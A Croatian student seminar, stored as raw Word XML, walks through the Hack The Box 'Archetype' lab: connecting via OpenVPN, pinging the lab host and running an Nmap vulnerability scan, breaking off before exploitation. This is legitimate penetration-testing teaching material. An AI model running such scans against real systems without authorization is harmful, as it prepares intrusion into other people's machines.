    <w:p w14:paraId="6DF48A6E" w14:textId="77777777" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="00E62C57"/>
    <w:p w14:paraId="11AA00FD" w14:textId="77777777" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="004B1F20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7AE276AA" wp14:editId="7344524A">
            <wp:extent cx="5257800" cy="2567965"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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49" cy="256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12FC" w14:textId="511F9C41" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="003D7C18">
      <w:pPr>
        <w:pStyle w:val="Opisslike"/>
      </w:pPr>
      <w:r w:rsidRPr="00E62C57">
        <w:t xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:instrText xml:space="preserve"> SEQ Slika \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:t>. Hack The Box web sučelje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFEA629" w14:textId="77777777" w:rsidR="004B1F20" w:rsidRPr="004B1F20" w:rsidRDefault="004B1F20" w:rsidP="004B1F20"/>
    <w:p w14:paraId="5B8FBD8E" w14:textId="335293ED" w:rsidR="004B1F20" w:rsidRDefault="004B1F20" w:rsidP="00E62C57">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">U gornjem desnom kutu </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>primijetite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8218F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Connect to HTB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> postavku. Odabirom na nju će vam se prikazati sljedeći izbornik.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Odaberite odgovarajuću opciju ovisno radite li na klasičnim virtualnim mašinama (</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Machines</w:t>
      </w:r>
      <w:r>
        <w:t>) ili na početnim virtualnim mašinama (</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Starting Point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). U našem slučaju, prvo radimo na </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Starting Point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualnoj mašini te odabiremo tu opciju.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1418C" w14:textId="77777777" w:rsidR="004B1F20" w:rsidRDefault="004B1F20" w:rsidP="004B1F20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3780AC75" wp14:editId="7836184E">
            <wp:extent cx="2501689" cy="3028950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771" cy="303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BD36" w14:textId="4BEABE3A" w:rsidR="004B1F20" w:rsidRPr="003D7C18" w:rsidRDefault="004B1F20" w:rsidP="003D7C18">
      <w:pPr>
        <w:pStyle w:val="Opisslike"/>
      </w:pPr>
      <w:r w:rsidRPr="003D7C18">
        <w:t xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:instrText xml:space="preserve"> SEQ Slika \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Spajanje na Starting Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F69D0C" w14:textId="77777777" w:rsidR="0057499E" w:rsidRPr="0057499E" w:rsidRDefault="0057499E" w:rsidP="0057499E"/>
    <w:p w14:paraId="271F3D94" w14:textId="4044D5F5" w:rsidR="004B1F20" w:rsidRDefault="00B37906" w:rsidP="0057499E">
      <w:r>
        <w:t>Potom</w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:t xml:space="preserve"> odaberemo opciju </w:t>
      </w:r>
      <w:r w:rsidR="0057499E" w:rsidRPr="00A8218F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Download VPN</w:t>
      </w:r>
      <w:r w:rsidR="00655239">
        <w:t xml:space="preserve"> koji koristi UDP (</w:t>
      </w:r>
      <w:r w:rsidR="00655239" w:rsidRPr="00655239">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User Datagram Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00655239">
        <w:t xml:space="preserve">) na </w:t>
      </w:r>
      <w:r w:rsidR="00655239" w:rsidRPr="00655239">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="00655239">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00655239" w:rsidRPr="00655239">
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:r w:rsidR="00655239">
        <w:t>1337</w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:t xml:space="preserve"> te skinemo </w:t>
      </w:r>
      <w:r w:rsidR="0057499E" w:rsidRPr="00DB5EAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>starting_point_NazivRačuna.opnv</w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54090EE1" w14:textId="77777777" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="0057499E"/>
    <w:p w14:paraId="0D78DD60" w14:textId="77777777" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="0057499E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0AE232D8" wp14:editId="20D1979C">
            <wp:extent cx="2284221" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="1905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81" cy="274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3282" w14:textId="299CF23B" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="003D7C18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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Spajanje na VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B750E" w14:textId="77777777" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="00E62C57"/>
    <w:p w14:paraId="2B1025C6" w14:textId="5C86CD85" w:rsidR="00E62C57" w:rsidRPr="0057499E" w:rsidRDefault="00E62C57" w:rsidP="00E62C57">
      <w:r>
        <w:t xml:space="preserve">Sljedeće, odaberite jednu od ponuđenih </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Starting Point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualnih mašini. U svrhu ovog seminara, mi smo odabrali </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Archetype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Vaccine Starting Point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualne mašine</w:t>
      </w:r>
      <w:r w:rsidR="004B1F20">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:t xml:space="preserve">Odaberite opciju </w:t>
      </w:r>
      <w:r w:rsidR="0057499E" w:rsidRPr="0057499E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Join Machine</w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057499E" w:rsidRPr="0057499E">
        <w:t>te će vaša virtualna mašina postati aktivna</w:t>
      </w:r>
      <w:r w:rsidR="0057499E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A654BF" w14:textId="0C379583" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="00E62C57"/>
    <w:p w14:paraId="6F84BCD7" w14:textId="77777777" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="0057499E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575315CB" wp14:editId="5699DA21">
            <wp:extent cx="5753100" cy="5781675"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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7FE1" w14:textId="213C9EDC" w:rsidR="00E62C57" w:rsidRDefault="0057499E" w:rsidP="003D7C18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9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Archetype ciljno računalo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982A10C" w14:textId="3A874C9F" w:rsidR="0057499E" w:rsidRDefault="0057499E" w:rsidP="0057499E"/>
    <w:p w14:paraId="62FF72A1" w14:textId="008BA821" w:rsidR="0057499E" w:rsidRPr="001C0708" w:rsidRDefault="0057499E" w:rsidP="0057499E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ovdje još možemo vidjeti neke podatke o odabranoj mašini, kao što su ocjene korisnika, operativni sustav mašine, broj korisnika koji su uspjeli riješiti mašinu i, najvažnije, IP</w:t>
      </w:r>
      <w:r w:rsidR="009D650E">
        <w:t>v4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0057499E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internet Protocol</w:t>
      </w:r>
      <w:r>
        <w:t>) adresu mašine</w:t>
      </w:r>
      <w:r w:rsidR="004C3692">
        <w:t xml:space="preserve"> koja je u našem slučaju </w:t>
      </w:r>
      <w:r w:rsidR="004C3692" w:rsidRPr="001C0708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.10.27.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561207E7" w14:textId="397A57FA" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc75785392"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hack The Box Starting Point: Archetype</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="47F230DD" w14:textId="23CA6748" w:rsidR="00C4523F" w:rsidRDefault="00C4523F" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="3DC1A3D0" w14:textId="7C81A70D" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00655239">
      <w:pPr>
        <w:ind w:firstLine="431"/>
      </w:pPr>
      <w:r>
        <w:t>Za početak, pozicionirajte se u direktorij gdje ste spremili VPN sesiju. U našem slučaju to je direktorij /home/ficekali/Downloads/Archetype. Locirajte starting_point_ImeRačuna.ovpn datoteku te ju pokrenite s naredbom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F2A831" w14:textId="39B4CA7A" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00655239">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD032A">
        <w:t>sudo openvpn starting_point_ACCOUNTNAME.ovpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74229A" w14:textId="77777777" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00655239">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="431"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77019A17" wp14:editId="2605FCAF">
            <wp:extent cx="5270740" cy="1225550"/>
            <wp:effectExtent l="0" t="0" r="635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21"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5305288" cy="123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57480" w14:textId="6A7D6531" w:rsidR="00655239" w:rsidRPr="00655239" w:rsidRDefault="00655239" w:rsidP="00E90794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10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Spajanje na VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455D998" w14:textId="45F0DE25" w:rsidR="001C0708" w:rsidRDefault="00655239" w:rsidP="00655239">
      <w:r>
        <w:t>Rezultat pokretanja naredbe bi trebao izgledati ovako:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05649535" w14:textId="77777777" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00655239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125FB48F" wp14:editId="679685AB">
            <wp:extent cx="4991229" cy="3536830"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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71" cy="35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5DBE" w14:textId="2AC8CBF0" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00655239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11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Spajanje na VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149753B4" w14:textId="77777777" w:rsidR="001C0708" w:rsidRPr="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708"/>
    <w:p w14:paraId="5CC14AB9" w14:textId="2BAC7976" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00C66C3B">
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avjet :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Ako iz bilo kojeg razloga budete imali probleme pri spajanju, unutar Hack The Box web sučelja pokušajte prebaciti VPN server u drugu regiju ili spremite VPN paket koji koristi TCP (</w:t>
      </w:r>
      <w:r w:rsidRPr="00655239">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Transmission Control Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) na </w:t>
      </w:r>
      <w:r w:rsidRPr="00655239">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t>-u 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9BA3B0" w14:textId="3EAE3343" w:rsidR="00655239" w:rsidRDefault="008A46DE" w:rsidP="00C66C3B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sada kada smo spojeni, trebamo pronaći naše novo VPN sučelje. To ćemo napraviti tako da otvorimo </w:t>
      </w:r>
      <w:r w:rsidRPr="008A46DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>novi terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te upišemo naredbu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C931785" w14:textId="7C8D070A" w:rsidR="008A46DE" w:rsidRDefault="008A46DE" w:rsidP="008A46DE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71075312" w14:textId="77777777" w:rsidR="008A46DE" w:rsidRDefault="008A46DE" w:rsidP="008A46DE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0FFE8F52" wp14:editId="7964A4B6">
            <wp:extent cx="5762625" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="9525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F362" w14:textId="2A35C1C9" w:rsidR="008A46DE" w:rsidRPr="008A46DE" w:rsidRDefault="008A46DE" w:rsidP="008A46DE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12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> IPv4 adresa našeg lokalnog računala (VPN-a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B5D47" w14:textId="6D93B25F" w:rsidR="00655239" w:rsidRDefault="008A46DE" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Ovdje vidimo da je </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8218F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„tun0“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sučelje naše novo VPN sučelje direktno spojeno na našu osobnu mrežu. IPv4 adresa našeg VPN sučelja je </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8218F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.15.63</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EC944" w14:textId="0201CC22" w:rsidR="008A46DE" w:rsidRDefault="008A46DE" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Hack The Box je </w:t>
      </w:r>
      <w:r w:rsidR="009D650E">
        <w:t>dovoljno darežljiv da nam o</w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="009D650E">
        <w:t xml:space="preserve">krije točnu IPv4 adresu ciljanog računala kojeg želimo hakirati. U našem slučaju to je računalo Archetype čija je IPv4 adresa </w:t>
      </w:r>
      <w:r w:rsidR="009D650E" w:rsidRPr="00A8218F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.10.27.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222877AA" w14:textId="311512D2" w:rsidR="001C0708" w:rsidRDefault="00E35BBA" w:rsidP="00C66C3B">
      <w:r>
        <w:t>Međutim, u stvarnom svijetu mož</w:t>
      </w:r>
      <w:r w:rsidR="001C0708">
        <w:t xml:space="preserve">emo napraviti različite OSINT-ove </w:t>
      </w:r>
      <w:r w:rsidR="001C0708" w:rsidRPr="001C0708">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001C0708" w:rsidRPr="001C0708">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>open-source intelligence</w:t>
      </w:r>
      <w:r w:rsidR="001C0708">
        <w:t xml:space="preserve">) i veliki broj </w:t>
      </w:r>
      <w:r w:rsidR="001C0708" w:rsidRPr="001C0708">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="001C0708">
        <w:t xml:space="preserve"> skeniranja da pronađemo odgovarajuću IP adresu računala kojeg želimo hakirati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036CCF5" w14:textId="6682CD6B" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="00C66C3B">
      <w:r>
        <w:t>Najbolja praksa da provjerimo jesmo li spojeni na Archetype računalo jest da „</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0708">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pingamo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> njegovu IP adresu, a to možemo s naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC29DF8" w14:textId="3D732F06" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ ping 10.10.10.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B43D9F" w14:textId="77777777" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708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2DF4155B" wp14:editId="43A7D1DB">
            <wp:extent cx="5762625" cy="1906270"/>
            <wp:effectExtent l="0" t="0" r="9525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8213" w14:textId="17ABF8B2" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708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13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t>pinganje Archetype ciljnog računala</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314858E4" w14:textId="3F86DF98" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="343CAFF9" w14:textId="1737B090" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="6CBF85EC" w14:textId="0A8192C4" w:rsidR="001C0708" w:rsidRDefault="001C0708">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E82F90" w14:textId="44F3C052" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc75785393"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enumera</w:t>
      </w:r>
      <w:r w:rsidR="00217F6A">
        <w:t>tion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3E14873F" w14:textId="34954FCF" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708"/>
    <w:p w14:paraId="5F237C75" w14:textId="6C0537BA" w:rsidR="001C0708" w:rsidRDefault="001C0708" w:rsidP="001C0708">
      <w:r>
        <w:t>Nakon što smo potvrdili vezu s ciljnim računalom, napokon možemo započeti s hakiranjem. Prvo ćemo pokrenuti Nmap skeniranje ciljnog računala da dobijemo predod</w:t>
      </w:r>
      <w:r w:rsidR="005C3744">
        <w:t>žbu o uslugama i njihovim verzijama koje se izvode na njemu. Tako možemo pripremiti različite CVE-ove (</w:t>
      </w:r>
      <w:r w:rsidR="005C3744" w:rsidRPr="005C3744">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Common Vulnerability Exploits</w:t>
      </w:r>
      <w:r w:rsidR="005C3744" w:rsidRPr="005C3744">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005C3744">
        <w:t xml:space="preserve"> koji će nam dobro doći kasnije. Nmap skeniranje pokrećemo naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288AE80" w14:textId="4B2763DA" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3744">
        <w:t>nmap -sV --script vulners 10.10.10.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241ED1E4" w14:textId="77777777" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744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561B1820" wp14:editId="6A19D1FE">
            <wp:extent cx="3830128" cy="2319803"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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59" cy="232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C0B8" w14:textId="4F0E2446" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744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14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t>. Nmap skeniranje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C53B3" w14:textId="77777777" w:rsidR="005C3744" w:rsidRPr="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744"/>
    <w:p w14:paraId="1F37BBAE" w14:textId="07C003F3" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="001C0708">
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avjet :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ako parametar </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3744">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"--script vulners"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne radi za vas, pokušajte s </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3744">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3744">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nmap -sV -Pn 10.10.10.27</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3744">
        <w:t>".</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Uputu kako koristiti Nmap skeniranje možete pronaći na slici 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C644250" w14:textId="77777777" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="001C0708"/>
    <w:p w14:paraId="22C36B78" w14:textId="77777777" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744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6DE22D0B" wp14:editId="7DFF8D5F">
            <wp:extent cx="3416061" cy="2343822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347" cy="236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0B3D9" w14:textId="163F207C" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744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15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Nmap upute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F840A" w14:textId="3FD38ABB" w:rsidR="005C3744" w:rsidRDefault="005C3744" w:rsidP="005C3744">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vratimo se na rezultat izvršavanja </w:t>
      </w:r>
      <w:r w:rsidR="00976554">
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r>
        <w:t>naredbe</w:t>
      </w:r>
      <w:r w:rsidR="00976554">
        <w:t xml:space="preserve"> vidljivog na slici 14. Ne morate biti stručnjak da bi protumačili što znače ovi rezultati. Jednostavnim </w:t>
      </w:r>
      <w:r w:rsidR="00976554" w:rsidRPr="00976554">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>googlanjem</w:t>
      </w:r>
      <w:r>
